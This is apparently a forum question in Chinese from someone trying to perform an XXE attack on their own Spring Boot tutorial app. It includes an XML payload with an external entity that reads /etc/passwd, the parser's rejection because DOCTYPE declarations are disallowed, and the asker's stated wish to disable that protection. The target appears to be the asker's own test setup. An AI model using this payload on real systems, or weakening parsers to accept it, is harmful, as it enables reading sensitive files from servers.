我想执行 XXE 攻击,我按照本教程https://grokonez.com/java-integration/convert-java-object-intofrom-xml-spring-boot并尝试使用实体注入进行攻击
xxe.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY xxeattack SYSTEM "file:///etc/passwd">
]>
<customer age="20">
<lastname>&xxeattack;</lastname>
<firstname>Jack</firstname>
</customer>
并面临错误:
Convert Customer Object to Xml!
Done
[Fatal Error] :2:10: DOCTYPE is disallowed when the feature "http://apache.org/xml/features/disallow-doctype-decl" set to true.
Convert Xml to Customer Object!
2018-08-04 09:48:02.308 INFO 57883 --- [main] utoConfigurationReportLoggingInitializer :
Error starting ApplicationContext. To display the auto-configuration report re-run your application with 'debug' enabled.
2018-08-04 09:48:02.317 ERROR 57883 --- [main] o.s.boot.SpringApplication : Application startup failed
java.lang.IllegalStateException: Failed to execute CommandLineRunner
at org.springframework.boot.SpringApplication.callRunner(SpringApplication.java:735) [spring-boot-1.5.7.RELEASE.jar:1.5.7.RELEASE]
at org.springframework.boot.SpringApplication.callRunners(SpringApplication.java:716) [spring-boot-1.5.7.RELEASE.jar:1.5.7.RELEASE]
at org.springframework.boot.SpringApplication.afterRefresh(SpringApplication.java:703) [spring-boot-1.5.7.RELEASE.jar:1.5.7.RELEASE]
at org.springframework.boot.SpringApplication.run(SpringApplication.java:304) [spring-boot-1.5.7.RELEASE.jar:1.5.7.RELEASE]
at org.springframework.boot.SpringApplication.run(SpringApplication.java:1118) [spring-boot-1.5.7.RELEASE.jar:1.5.7.RELEASE]
at org.springframework.boot.SpringApplication.run(SpringApplication.java:1107) [spring-boot-1.5.7.RELEASE.jar:1.5.7.RELEASE]
at com.javasampleapproach.marshalling.SpringBootMarshallingApplication.main(SpringBootMarshallingApplication.java:19) [classes/:na]
Caused by: org.springframework.oxm.UnmarshallingFailureException: SAX reader exception; nested exception is org.xml.sax.SAXParseException; lineNumber: 2; columnNumber: 10; DOCTYPE is disallowed when the feature "http://apache.org/xml/features/disallow-doctype-decl" set to true.
at org.springframework.oxm.castor.CastorMarshaller.unmarshalSaxReader(CastorMarshaller.java:626) ~[spring-oxm-4.3.11.RELEASE.jar:4.3.11.RELEASE]
at org.springframework.oxm.support.AbstractMarshaller.unmarshalSaxSource(AbstractMarshaller.java:435) ~[spring-oxm-4.3.11.RELEASE.jar:4.3.11.RELEASE]
at org.springframework.oxm.support.AbstractMarshaller.unmarshalStreamSource(AbstractMarshaller.java:463) ~[spring-oxm-4.3.11.RELEASE.jar:4.3.11.RELEASE]
at org.springframework.oxm.support.AbstractMarshaller.unmarshal(AbstractMarshaller.java:354) ~[spring-oxm-4.3.11.RELEASE.jar:4.3.11.RELEASE]
at com.javasampleapproach.marshalling.xmlconvert.XmlConverter.convertFromXMLToObject(XmlConverter.java:46) ~[classes/:na]
at com.javasampleapproach.marshalling.SpringBootMarshallingApplication.run(SpringBootMarshallingApplication.java:36) [classes/:na]
at org.springframework.boot.SpringApplication.callRunner(SpringApplication.java:732) [spring-boot-1.5.7.RELEASE.jar:1.5.7.RELEASE]
... 6 common frames omitted
Caused by: org.xml.sax.SAXParseException: DOCTYPE is disallowed when the feature "http://apache.org/xml/features/disallow-doctype-decl" set to true.
at org.apache.xerces.parsers.AbstractSAXParser.parse(Unknown Source) ~[xercesImpl-2.11.0.jar:na]
at org.springframework.oxm.castor.CastorMarshaller.unmarshalSaxReader(CastorMarshaller.java:622) ~[spring-oxm-4.3.11.RELEASE.jar:4.3.11.RELEASE]
... 12 common frames omitted
研究了 2 天,仍然无法启用允许解析非法实体。